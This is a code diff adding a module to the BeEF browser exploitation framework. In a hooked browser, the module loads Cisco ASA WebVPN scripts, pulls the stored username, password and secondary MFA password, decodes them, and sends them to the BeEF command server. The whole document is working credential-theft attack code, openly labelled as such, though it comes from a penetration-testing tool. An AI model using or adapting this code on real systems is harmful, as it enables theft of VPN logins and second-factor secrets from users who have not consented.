Adding plaintext password recovery for Cisco ASA WebVPN Sessions.

modules/browser/hooked_domain/cisco_asa_password_disclosure/command.js

@@ -0,0 +1,24 @@
+//
+// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var s = document.createElement("script");
+  s.src = "/+CSCOE+/common.js"
+  document.body.appendChild(s);
+  s = document.createElement("script");
+  s.src = "/+CSCOE+/appstart.js";
+  document.body.appendChild(s);
+  setTimeout(function () {
+    creds = getcredentials();
+    var result = [];
+    result.push({
+      "username": rot13(hex_2_ascii(creds.split('/')[0].split('=')[1])),
+      "password": rot13(hex_2_ascii(creds.split('/')[1].split('=')[1])),
+      "secondary_password": rot13(hex_2_ascii(creds.split('/')[5].split('=')[1]))
+    });
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=" + JSON.stringify(result));
+  }, 3000);
+});

modules/browser/hooked_domain/cisco_asa_password_disclosure/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        Cisco_asa_passwords:
+            enable: true
+            category: ["Browser", "Hooked Domain"]
+            name: "Cisco ASA Plaintext Passwords"
+            description: "Recover Username, password, and second password (MFA) used for a Cisco ASA WebVPN session. The hooked domain needs to be the domain authenticated against."
+            authors: ["catatonicprime"]
+            target:
+                working: ["All"]

modules/browser/hooked_domain/cisco_asa_password_disclosure/module.rb

@@ -0,0 +1,12 @@
+#
+# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Cisco_asa_passwords < BeEF::Core::Command
+  def post_execute
+    content = {}
+    content['cisco_asa_passwords'] = @datastore['cisco_asa_passwords']
+    save content
+  end
+end